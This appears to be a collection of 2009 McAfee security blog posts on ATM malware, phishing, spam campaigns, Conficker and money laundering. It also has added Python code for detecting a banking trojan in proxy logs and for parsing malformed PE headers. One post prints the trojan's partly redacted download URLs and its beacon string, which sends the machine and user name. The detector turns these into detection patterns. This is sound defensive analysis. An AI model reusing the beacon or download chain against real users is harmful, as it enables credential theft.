    One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3, The Register also raised public awareness by covering the story.

    When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

    Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

    The attacker can also–through a password-protected routine–control the currency-dispensing ATM cassette:

    We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

    The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

    New McAfee Whitepaper on Browser Attacks

    Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

    Web Browsers: An Emerging Platform Under Attack
    “The widespread use of highly interactive ‘rich client’ web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success.”

    Other areas the paper covers include:

    • The shift in spam to mainly malicious web link usage

    • “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

    • Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

    • Use of malicious video banners placed in advertisement networks

    • Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

    Download the paper in its entirety here.

    Social Engineering Aids Malware Delivery

    Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:
    Bank of America phish
    If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

    Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

    The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

    Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :).

    McAfee Releases June Spam Report

    Today we released our Spam Report for the month of June. In it we discuss two key findings:

    President Obama’s First 100 Days of Spam
    Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

    Identifying Spam Trends of the Future
    Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

    What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

    McAfee Unveils H*Commerce Web Film Series on Cybercrime

    Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

    The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

    The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

    Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

    Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

    Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

    Fight Against Cybercrime Gets Organized

    The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Initiative to Fight Cybercrime has been in force for more than a half-year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

    McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

    Even more important were the small meetings outside the official program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future! ;)

    McAfee Releases First-Quarter Threats Report

    Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

    Other Key Findings

    The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

    Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

    Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

    Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

    You can find the full text of the “McAfee Threats Report: First Quarter 2009” here.

    Swine Flu Subjects and e-Pharmacy Sites

    We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

    The image below is a collection of a bunch of swine flu spams:

    Swine Flu Spams

    You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

    Here is a screenshot of the e-pharmacy they all lead to:

    Swine Flu e-Pharm Site

    You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

    As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

    Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

    A closer look at a Swine Flu spam

    It’s been just a few days since we started talking about spam using Swine Flu as a way to catch users’ attention to sell pills. This time, however, the message is not very “healthy”:

    Swine Flu

    The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calming down is the only thing we shouldn’t do. See what the patient becomes in the advanced stage”.

    As we saw yesterday in David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch users’ attention. But remember, this is spam; they use this to make users believe that the news is true.

    The links lead to two different malware files:

    http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar
    => Foto.29.04.2009.com

    http://[removed].ru./uploaded/alerta.php?atencao=ver
    => Foto.29.04.2009.jpg.exe

    They are identified as PWS-Banker-dldr and PWS-banker-gen.g.

    The file Foto.29.04.2009.com is a downloader which fetches the file at the URL below and drops it as C:\WINDOWS\temp\configura.exe:

    http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

    This file is identified as PWS-Banker-gen.b.

    This is a common banker malware which overlays a fake image over the real banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter his personal information and even his credit card data:

    overlayed bank image

    overlayed bank image

    overlayed bank image

    The information about the hacked machine and the banking data are then posted to the sites below:

    hxxp://[removed-1].100webspace.net/post.php
    hxxp://[removed-2].100webspace.net/post.php
    hxxp://[removed-3].100webspace.net/post.php
    hxxp://[removed-4].100webspace.net/post.php

    This is the string appended to the URLs above:

    tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

    But one image inside this malware caught our attention. The image below tries to disguise itself as the website of the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

    overlayed bank image

    They attempt to steal usernames and passwords for this site. If the miscreants got access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

    As we can see, an apparently innocent e-mail can lead to your banking information being stolen, and even to more serious consequences, as in the case above.
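The URL patterns in this post (the alerta.php lure link, the post.php beacon with its tipo/tip/inf fields, and the image-named second stage pulled from a bare IP) are enough to write detection logic for a web proxy log. The script below does that over constructed log lines; it is an added example, not McAfee code, and the host names, client addresses, machine name and user name are made up.

```python
"""Detection logic for the HTTP traffic the post describes, run over constructed
proxy-log lines. Added example, not McAfee code: the URL patterns (alerta.php
lure, post.php beacon, image-named payload on a bare IP) come from the post,
while host names, client addresses, machine and user names are made up."""
import ipaddress
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log, one request per line:
# "<timestamp> <client> <method> <url> <status>"
SAMPLE_PROXY_LOG = """\
2009-04-30T09:01:12Z 10.1.2.15 GET http://www.example.invalid/index.html 200
2009-04-30T09:02:40Z 10.1.2.15 GET http://cch.example-lure.invalid/images/thumb/xxx/alerta.php?atencao=visualizar 200
2009-04-30T09:02:44Z 10.1.2.15 GET http://203.0.113.7/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif 200
2009-04-30T09:03:01Z 10.1.2.15 GET http://drop1.example-host.invalid/post.php?tipo=inf&tip=WKS-FIN-02+mrodrigues&inf=INFECTADO%0D%0A& 200
2009-04-30T09:05:19Z 10.1.2.33 GET http://blog.example.invalid/post.php?id=42 200
"""


def _is_ip_literal(host: Optional[str]) -> bool:
    """True when the URL host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def classify_url(url: str) -> Optional[Dict[str, str]]:
    """Return an alert dict when the URL matches one of the campaign's patterns."""
    parts = urlsplit(url)
    path = parts.path.lower()
    host = parts.hostname or ""
    # parse_qs undoes percent-encoding and turns '+' into a space, so the
    # beacon's "tip=[machinename]+[username]" arrives as "machine user".
    query = parse_qs(parts.query)

    # 1. The spam's lure link: alerta.php carrying an 'atencao' parameter.
    if path.endswith("/alerta.php") and "atencao" in query:
        return {"rule": "swineflu-lure-link", "host": host,
                "lure_action": query["atencao"][0]}

    # 2. The infection beacon: post.php with tipo=inf and inf=INFECTADO<CRLF>.
    if (path.endswith("/post.php") and query.get("tipo") == ["inf"]
            and query.get("inf", [""])[0].startswith("INFECTADO")):
        machine, _, user = query.get("tip", [""])[0].partition(" ")
        return {"rule": "banker-infection-beacon", "host": host,
                "machine": machine, "user": user}

    # 3. Weak heuristic: an "image" fetched from a bare IP address, the way the
    #    second stage (Pcrazy.gif) was. Confirm against the response body.
    if _is_ip_literal(host) and path.endswith((".gif", ".jpg", ".jpeg")):
        return {"rule": "second-stage-image-from-ip", "host": host,
                "confidence": "low"}
    return None


def scan_proxy_log(log: str) -> List[Dict[str, str]]:
    """Apply classify_url to every log line and stamp hits with time and client."""
    alerts = []
    for line in log.splitlines():
        if not line.strip():
            continue
        timestamp, client, _method, url, _status = line.split()
        hit = classify_url(url)
        if hit:
            hit.update(time=timestamp, client=client)
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(alert)
```

The last log line (a blog's post.php with an unrelated query) is there to show the beacon rule keys on the tipo/inf fields rather than on the script name alone.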

    Looking at Swine Flu Spam Globally

    Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…

    Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

    Percent Increase of Swine Flu in Subject Line

    Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

    From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway, but the country breakdown is interesting to look at. Seems that Brazil, the United States, and Germany are the biggest producers/sources at the moment:

    Countries Sending Swine Flu Spam

    No safe country from spammers eh? When you consider that on any given day there are between 80 and 170 billion email messages, with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers’ disposal, and it is very hard to protect against.

    April Email and Spam Volumes

    We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case it’s a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

    Swine Flu Redirect to Fake Codec

    Malware writers, spammers, and scammers are lowlifes. They will use any high-profile media event or high-impact news story to push their wares, including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic, go to the World Health Organization website.

    Laundering as a Service

    Money laundering is a process for concealing the origin of funds generated by illegal means. People generally associate money laundering with drug trafficking, gun smuggling, or corruption. But funds misappropriated by identity theft, phishing, and carding also have to be “laundered.” Today, the mushrooming of virtual money (or e-currency) makes the job easier when you need to eliminate traces of suspicious actions. In the past, E-Gold and WebMoney were frequently under suspicion and had to respond to serious allegations of having been used to transform “dirty money” into “clean money.”

    But they are not unique; ECUMoney, Liberty Reserve, PerfectMoney, Pecunix, etc. are also on the scene. As with all digital gold currencies, these exchangers offer nonreversible transactions, which is a primary advantage when you want to manipulate money.

    Today, websites proposing virtual money exchanges are numerous on the Internet. They are profitable for their owners because they are subject to significant exchange commissions. It is also relatively safe for the people offering these services. In the past, malware authors explained they created their programs only for educational purposes and were not responsible for any inappropriate use. Today administrators of such websites are trying to claim they are not liable for the origin of the transmitting money.

    Here too, the network is turning professional, and many former crooks are now specializing in this field. In October 2004, the U.S. Secret Service arrested people said to be responsible for a set of credit card and identity thefts that had plagued Internet users. It was the result of Operation Firewall. Most of them frequented ShadowCrew, a worldwide marketplace where thousands of members traded stolen credit cards and debit cards, as well as bank account numbers and counterfeit identification documents, such as drivers’ licenses, passports, and Social Security cards.

    One convicted person, using Voleur (French for “thief”) as a pseudonym, set up a special payment system for cybercrime transactions. For a 10 percent commission, he exchanged cash for E-Gold, the well-known and controversial digital gold currency. Voleur laundered money for dozens of deals of forum members, moving amounts ranging from $40,000 to $100,000 per week. With about twenty other individuals, he pleaded guilty in November 2005, was sentenced in June 2006, and was released later on.

    At that time, Voleur’s work was not institutionalized. But today, I believe, this individual is again in business and manages some websites specialized in giving advice for digital currency activities. One of them is named “Voleur Financial Services”; that’s a tall order!

    http://vil.nai.com/images/FP_BLOG_090416_1.jpg

    On another site from the same origin (same administrators), we can see some examples of current fees:

    http://vil.nai.com/images/FP_BLOG_090416_2.jpg

    Many people want to seize power in this fruitful business, and there are no holds barred. Enemies of Voleur often spread stories of him on the Internet and do not hesitate to reveal bank account numbers.

    http://vil.nai.com/images/FP_BLOG_090416_5.jpg


    U.S. nationals are not alone in this business. At the time of Operation Firewall, an Eastern European married couple (he is Russian, she is Ukrainian), their son, and several other people were arrested after they moved more than $35 million in suspect funds through their company, a pioneer of virtual money exchange. Their office was originally located in the Empire State Building, in New York City. Approximately $20 million flowed through E-Gold digital currency accounts. It is also estimated they purchased approximately $15 million worth of WebMoney digital currency.

    Now, from the Manhattan House of Detention, the main prisoner/offender keeps his blog, gives security advice, and is visited by compassionate countrymen. Some of his friends (I suppose) still manage such exchange sites from Russia. From one of them, these screen shots show transfer fees and how easy it is to remain anonymous in the world of money transfers.

    http://vil.nai.com/images/FP_BLOG_090416_3.jpg
    http://vil.nai.com/images/FP_BLOG_090416_6.jpg


    When you visit the website, you will discover a touching interview made in a U.S. jail and the (presumed) building housing the actual company: a bit empty, but nonetheless prestigious in the New York area.

    http://vil.nai.com/images/FP_BLOG_090416_4.jpg

    In early April, at an annual conference of the Association of Russian Banks, Finance Minister Alexei Kudrin explained that many small banks are now “engaged in money laundering”. It seems that many suspicious online companies are also engaged in this business both in and outside of Russia.

    Hacking Exposed at RSA

    RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

    For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

    For those who were not among the anointed who attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

    Mac Malware In The News

    There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

    Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

    As we discussed in our previous blog, it is spread through pirated software at this point (a huge no-no anyway), so hopefully distribution will be light and not result in large numbers. It definitely does highlight the need for security software regardless of platform!

    The Carbon Footprint of Spam

    Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

    • The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
    • Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
    • Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
    • If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
    • Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
    • While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

    Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

    Conficker on the prowl after the 1st…

    So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

    Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

    Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

    When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendezvous to start its latest escapade. In this case, the infected host is contacted initially by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, this time started by the infected host.

    Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (i.e., the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

    So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

    We have also seen some hosts serving up a Waledac payload. (Realistically, it may contain anything that the bad guys are serving up on those domains.)

    These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

    Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time, however, it is closer to the original patch, so as to elude detection. (Note: our McAfee Conficker Detection tool is in the process of being redesigned to allow detection of the latest variants.)

    There are also two other notes of interest. The first is that we have a new deadline to watch: on May 3rd this latest variant is set to expire.

    Thinking aloud, this point brings some interesting questions to mind. Is this just a test from the Conficker crew, who are serving up Waledac incidentally? Or is this done for other self-serving reasons (i.e., attention diversion)? Maybe it’s just a deadline for a rented botnet? Interesting questions that I am sure the security community at large is also asking.

    Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the new IP is in the list, it moves on to the next domain in its list.

    Of course, we will update if anything else comes along…

    Google Searching for Madoff’s Yacht Leads to Fake Anti-Virus and Malware

    Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributors have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht, a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out malware distributors have homed in on the yacht phrase, and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious, and our first take was “Wow, they are fast.” We watched the evolution of the number of Google results that presented malware over the course of April 2. The last we checked, even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

    Google Search Results

    The search results don’t look so threatening, but if you click on the first few URLs, you’ll find differently. Each of these URLs is a rogue anti-virus URL that will distribute malware. Here are a couple of examples…

    Quite a bad site indeed!

    Misleading Searches Lead to Porn and Malware!!!

    These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

    This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

    Rogue AV Sure Does Look Real!!!

    So what about that 1969 Rybovich? What about further curiosity-based Googling? Next time you find yourself conducting such a search, do so with caution. Consider whether the search result URLs all look similar. In this case, that is the first red flag. When you click to go to a link, does the content look like what you expected, or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed to red flag number three, the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

    The most common vulnerabilities used by malevolent URLs in China

    Every day there are thousands of websites that have been injected with malicious code, and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

    1. BaoFeng2 Storm
    BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, is easy to use, and is free. Multiple buffer overflows in BaoFeng2 Storm allow for the downloading and execution of files. Its CVE number is CVE-2007-4816.
    Reference:

    http://www.baofeng.com/

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

    2. Baidu Soba
    Baidu Soba is a search bar for the Internet that integrates a powerful MP3 search, web page search, Flash search, and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. Its CVE number is CVE-2007-4105.
    Reference:

    http://bar.baidu.com

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

    3. Xunlei Web
    Xunlei Web is downloader software. Its GUI control is very browser-like. Users can find more and more valuable resources to download via Xunlei Web, so it has a great many customers. Buffer overflows in Xunlei Web before version 5.6.3.44 allow execution of arbitrary code. Its CVE number is CVE-2007-5064.
    Reference:

    http://dl.xunlei.com/index.htm

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

    4. PPStream
    PPStream is IPTV software based on P2P streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow execution of arbitrary code. Its CVE number is CVE-2007-4748.
    Reference:

    http://www.ppstream.com

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

    5. OurGame Chat
    OurGame is a free gaming platform that covers all the related fields and areas of network games. It offers nearly one hundred kinds of games, including card games, leisure games, large-scale network games, and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module, in the ConnectAndEnterRoom() method, allow execution of arbitrary code. Its CVE number is CVE-2007-5722.
    Reference:

    http://www.ourgame.com

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

    6. Ultra Star Reader
    Ultra Star Reader is an e-book reader tool, similar to a PDF reader. Buffer overflows in Ultra Star Reader allow execution of arbitrary code. Its CVE number is CVE-2007-5807.
    Reference:

    http://www.ssreader.com

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

    7. JetAudio
    JetAudio is a media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allow for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
    Reference:

    http://www.jetaudio.com

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

    8. Xunlei Thunder
    Xunlei Thunder is free downloader software. It supports multiple download protocols such as HTTP, FTP, and BitTorrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow execution of arbitrary code. Its CVE number is CVE-2007-6144.
    Reference:

    http://www.xunlei.com

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

    What you see is NOT what you get

    We’ve all read of social engineering tactics before and how gullible users fall prey to many tactics used by virus authors. As researchers we often give recommendations to family and friends on how not to fall prey to such tricks, but once in a while we need to remind ourselves too that we are included in the intended list of targets.

    As researchers we deal with different flavors of malware. Over time and with experience, researchers often reach a state of “enlightenment” where you look at a sample and you know whether it’s malicious. At least that’s what we believe; however, there are times when we too are made to think twice. When dealing with malware it’s not uncommon for analysts to come across a note from the authors once in a while. At times they are taunts, and at times they are something more like the example below. We came across a sample which contains messages for security researchers asking them not to add detection for the file, as this is not a virus. Considering that there are legitimate packers that put in warnings for researchers to prevent false detections, such non-verbal communication can at times make one take a second look.

    In the words of a malware author

    Besides the fact that they seem to agree that they have authored this program :) , technically they are right: this is not a virus, but a trojan downloader!! This trojan silently downloads arbitrary files (a porn dialer in this particular case) from a remote site (hxxp://[skipped].com/del/cmb_[random].exe) and executes them. (New detection added to detect both samples is “Generic.acf”.)

    A second example was a little more fascinating for us. Researchers often take two approaches to analysis: Static (opening up the file in Hiew or other similar tools) and Dynamic (replicating the malware). In this case we opened the file in Hiew and the first thing that was apparent was that the file had abnormal resources and import data.

    Abnormal Resources

    Moving past this error, we also noticed that the Entry Point (EP) given in the header is 0001A001 and, for an Image Base of 00400000, Hiew should be able to go to the EP at 0041A001. However, the file appears to end at 00410DFF, so Hiew fails to reach the EP.

    Header Information for EP

    At this point we are more or less sure that this file is corrupt and that this could be the end of the analysis, but WAIT!!! Though we might expect the Windows loader to complain if we attempt to execute this sample, it actually runs like a charm. OK, things are getting really fishy, so back to the drawing board we go. We re-open the file in Hiew, and this time we observe the section table in more detail.

    Section Table Entries

    There are 10 odd-looking sections, which is fine; some of the sections have a Physical Size of 0 and others overlap, which, though suspicious, is also fine. And then we stumble upon the probable culprit. The authors have modified the Physical Size of the first two sections to FF003000 and FF000200 respectively, whereas their Virtual Sizes are 3000 and 1000. Patching the section sizes to 00003000 and 00000200 fixes the EP issue in Hiew, allowing it to get to the correct EP.

    Heck, even IDA wasn’t able to load the file; it gave the following error and quit: “Virtual Array: Address space limit reached”
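    To show why an oversized Physical Size (SizeOfRawData) derails an RVA-to-file-offset lookup and how an analysis tool can sanity-check the section table before trusting it, here is an added example in Python; it is not code from the post or from any McAfee tool. It builds a constructed three-section table using the raw sizes FF003000 and FF000200 against virtual sizes 3000 and 1000, the Entry Point 0001A001, Image Base 00400000 and file end 00410DFF from the post; the VirtualAddress and PointerToRawData values and the third section that actually holds the entry point are assumptions made so the example is self-contained. A naive mapper that trusts SizeOfRawData lets the first section swallow the entry-point RVA and lands past the end of the file, as Hiew did; the hardened mapper uses VirtualSize for the in-memory extent and clamps the raw data to what the file really contains.

```python
import struct

# IMAGE_SECTION_HEADER is 40 bytes: Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics.
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")

IMAGE_BASE = 0x400000   # Image Base from the post
ENTRY_RVA = 0x1A001     # AddressOfEntryPoint from the post
FILE_SIZE = 0x10E00     # the file ends at 0x10DFF, as in the post


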